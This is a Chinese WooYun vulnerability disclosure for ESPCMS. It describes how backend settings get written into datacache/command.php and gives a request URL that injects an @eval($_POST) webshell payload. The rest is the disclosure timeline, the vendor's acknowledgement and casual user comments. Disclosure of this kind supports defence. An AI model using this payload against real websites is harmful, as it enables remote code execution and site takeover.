当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045688

漏洞标题:espcms Command Execution Vulnerability可getshell(鸡肋)

相关厂商:易思ESPCMS企业网站管理系统

漏洞作者: redrain有节操

提交时间:2013-12-12 10:23

修复时间:2014-03-12 10:23

公开时间:2014-03-12 10:23

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-12: 细节已通知厂商并且等待厂商处理中
2013-12-13: 厂商已经确认,细节仅向厂商公开
2013-12-16: 细节向第三方安全合作伙伴开放
2014-02-06: 细节向核心白帽子及相关领域专家公开
2014-02-16: 细节向普通白帽子公开
2014-02-26: 细节向实习白帽子公开
2014-03-12: 细节向公众公开

简要描述:

RT

详细说明:

在后台getshell,略鸡肋
在/datacache/command.php文件

$CONFIG=Array(
//ICP备案
'icpbeian'=>'',
//网站状态
'is_close'=>0,
//管理员Email
'admine_mail'=>'11@qq.com',
//网站网址
'domain'=>'http://localhost/espcms/',
//日志记录
'is_log'=>1,
…………


后台修改网站系统设置后可将代码写入command.php中

1.png


2.png


访问command.php并传参

http://localhost/espcms/datacache/command.php?test=@eval%28$_POST[%27a%27]%29;


3.png

漏洞证明:

2.png


3.png

修复方案:

要过滤的噻

版权声明:转载请注明来源 redrain有节操@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-12-13 10:40

厂商回复:

感谢您提供此漏洞,我们会尽快修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-12 10:50 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    我擦 当年我看了这cms这么久都没看出来 你居然找到了

  2. 2013-12-12 11:31 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)

    @erevus 这个系统还有不鸡肋的漏洞哈~~~,应该还在好久没看了

  3. 2013-12-12 15:09 | 膜拜hym ( 路人 | Rank:15 漏洞数:2 )

    @redrain有节操 久仰大牛,能不能留个联系方式

  4. 2013-12-12 18:15 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @膜拜hym 。。。求不黑,我是菜逼

  5. 2013-12-13 10:12 | 膜拜hym ( 路人 | Rank:15 漏洞数:2 )

    @redrain有节操 看这标题就知道你是大牛了

  6. 2013-12-16 14:21 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @redrain有节操 广西黑阔,我说怎么看名字感觉有点熟悉,一看球不黑我就知道是谁了

  7. 2013-12-16 14:53 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @Mosuan 咳咳,大牛不要闹,汪汪

  8. 2013-12-16 21:22 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @redrain有节操 擦,我也是广西的,我是菜鸟。

  9. 2013-12-16 23:05 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    仰慕大牛很久了,求联系方式

  10. 2013-12-17 01:36 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @saline 翘,我叫maple,去联系吧,还能不能玩耍的

  11. 2013-12-17 01:37 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @Mosuan 仰慕大牛很久了

  12. 2013-12-17 08:05 | 膜拜hym ( 路人 | Rank:15 漏洞数:2 )

    @saline 别学我,我叫ztz打你

  13. 2013-12-17 14:02 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @redrain有节操 仰慕大牛很久了

  14. 2013-12-17 14:05 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    @膜拜hym 噗~同时也仰慕大牛很久了。我居然发现你的真实id了

  15. 2013-12-17 14:13 | 膜拜hym ( 路人 | Rank:15 漏洞数:2 )

    @saline 我会告诉你,这个也是马甲么

  16. 2013-12-17 14:16 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @saline 我不跟你玩了,信不信我让猪头子来咬你

  17. 2013-12-17 14:19 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    @redrain有节操 @膜拜hym 一群马甲党~哟哟~来嗦~怕你住爪子

  18. 2014-03-12 10:34 | Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)

    @redrain有节操 久仰大牛,能不能留个联系方式

  19. 2014-03-13 22:02 | 飞扬风 ( 普通白帽子 | Rank:512 漏洞数:125 | 追求安全,热爱技术)

    @redrain有节操 我也是来膜拜大牛的